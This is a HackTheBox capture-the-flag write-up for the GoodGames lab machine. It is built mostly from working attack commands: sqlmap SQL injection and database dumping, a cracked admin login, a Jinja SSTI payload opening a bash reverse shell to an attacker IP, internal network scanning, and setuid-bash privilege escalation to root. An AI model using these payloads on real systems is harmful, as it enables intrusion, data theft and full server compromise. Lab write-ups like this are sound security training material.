HackTheBox GoodGames Writeup

Explore the fundamentals of cybersecurity in the GoodGames Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.130 goodgames.htb internal-administration.goodgames.htb

Script to add hosts automatically

ip="10.10.11.130"
domain="goodgames.htb internal-administration.goodgames.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV goodgames.htb

Nmap scan report for goodgames.htb (10.10.11.130)
Host is up (0.053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2

Exploiting GoodGames HTB

1. Register on http://goodgames.htb/signup.

2. Intercept the login request and begin testing for SQL injection with sqlmap.

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10

1. List databases with SQLMap:

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 --dbs

1. Dump the main database:

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 -D main --dump

Searching the Hash

• Search for the hash 2b22337f218b2d82dfc3b6f77e7cb8ec on Google, which reveals the password.

Logging into Internal Admin Panel

1. Log in to http://internal-administration.goodgames.htb/login.

   Credentials:

   • admin:superadministrator

2. The interesting page is http://internal-administration.goodgames.htb/settings.

Exploit SSTI for Reverse Shell

1. Change the username, capture the request, and modify it to execute the reverse shell:

{{ namespace.__init__.__globals__.os.popen('bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.10/9001+0>%261"').read() }}

1. Upgrade to a better shell using the following method:

script /dev/null -c bash

1. Send the shell to the foreground:

Press Ctrl + Z to background the shell, then run:

stty raw -echo; fg

Gaining Access

1. Access user.txt:

cat /home/augustus/user.txt

1. Copy bash to your home directory:

cp /bin/bash /home/augustus

1. Check if you’re inside a Docker container by looking for .dockerenv:

ls -a /

Network Exploration

1. Ping sweep to find hosts:

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

1. Check for open ports on the discovered host (example 172.19.0.1):

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

1. SSH into the discovered host:

ssh augustus@172.19.0.1 
cp /bin/bash /home/augustus
exit

Privilege Escalation

1. Change permissions for bash to allow root execution:

chown root:root /home/augustus/bash 
chmod 4777 /home/augustus/bash

1. Log in again via SSH:

ssh augustus@172.19.0.1 

1. Execute bash with preserved privileges:

./bash -p

1. Read root.txt:

cat /root/root.txt